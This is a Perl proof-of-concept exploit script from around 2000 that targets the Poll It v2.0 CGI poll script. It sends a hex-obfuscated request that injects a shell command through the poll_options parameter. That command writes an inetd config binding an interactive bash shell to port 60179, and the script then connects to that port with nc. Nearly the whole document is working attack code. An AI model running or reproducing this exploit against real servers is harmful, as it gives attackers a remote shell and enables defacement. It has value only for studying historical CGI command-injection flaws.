#!/usr/bin/perl -w

## Poll It v2.0 CGI / Proof of Conecept Exploit.
## 
## The flaw in Poll It v2.0 has supposedly been
## used in many of the latest defacements.
##
## Credit to Elias Levy for explaining how the 
## CGI script could be exploited in his post to
## Bugtraw. Thanks to Chris Gunso for tips and 
## testing.
##
## The exploit will bind a shell to port 60179
## (fido) using inetd.
##
## Written by teleh0r@doglover.com / anno 2000  

use strict; use Socket;

if (@ARGV < 1) {
    print("Usage: $0 <target>\n");
    exit(1);
}

my($target,$agent,$evilcode,$sploit,$iaddr,
   $paddr,$proto);

$target = $ARGV[0];

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/pollit.pl\n");

$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

# echo '60179 stream tcp nowait nobody /bin/bash bash -i' >
# /tmp/.hass;  /usr/sbin/inetd /tmp/.hass

$evilcode =
# Poll It v2.0 CGI Portbinding CGI code (TM) / heh
"\x61\x64\x6d\x69\x6e\x5f\x70\x61\x73\x73\x77\x6f\x72".
"\x64\x3d\x68\x61\x73\x73\x26\x65\x6e\x74\x65\x72\x65".
"\x64\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x3d\x68\x61".
"\x73\x73\x26\x61\x63\x74\x69\x6f\x6e\x3d\x61\x64\x64".
"\x5f\x6f\x70\x74\x69\x6f\x6e\x26\x61\x64\x64\x5f\x6f".
"\x70\x74\x69\x6f\x6e\x3d\x31\x26\x70\x6f\x6c\x6c\x5f".
"\x6f\x70\x74\x69\x6f\x6e\x73\x3d\x65\x63\x68\x6f\x2b".
"\x27\x36\x30\x31\x37\x39\x2b\x73\x74\x72\x65\x61\x6d".
"\x2b\x74\x63\x70\x2b\x6e\x6f\x77\x61\x69\x74\x2b\x6e".
"\x6f\x62\x6f\x64\x79\x2b\x2f\x62\x69\x6e\x2f\x62\x61".
"\x73\x68\x2b\x62\x61\x73\x68\x2b\x2d\x69\x27\x2b\x3e".
"\x2b\x2f\x74\x6d\x70\x2f\x2e\x68\x61\x73\x73\x3b\x2f".
"\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x69\x6e\x65\x74".
"\x64\x2b\x2f\x74\x6d\x70\x2f\x2e\x68\x61\x73\x73\x7c";

# You may have to change both the path to the script,
# as well as the name of the script name.

$sploit =
"GET /cgi-bin/poll.cgi?$evilcode HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8";

$iaddr = inet_aton($target)                   || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr)              || die("Error: $!\n");
$proto = getprotobyname('tcp')                || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto)  || die("Error: $!\n");
connect(SOCKET, $paddr)                       || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0)             || die("Error: $!\n");
close(SOCKET);

print("\nSleeping 5 seconds - waiting for the shell ...\n\n");
sleep(5); system("nc -w 10 $target 60179"); exit(0);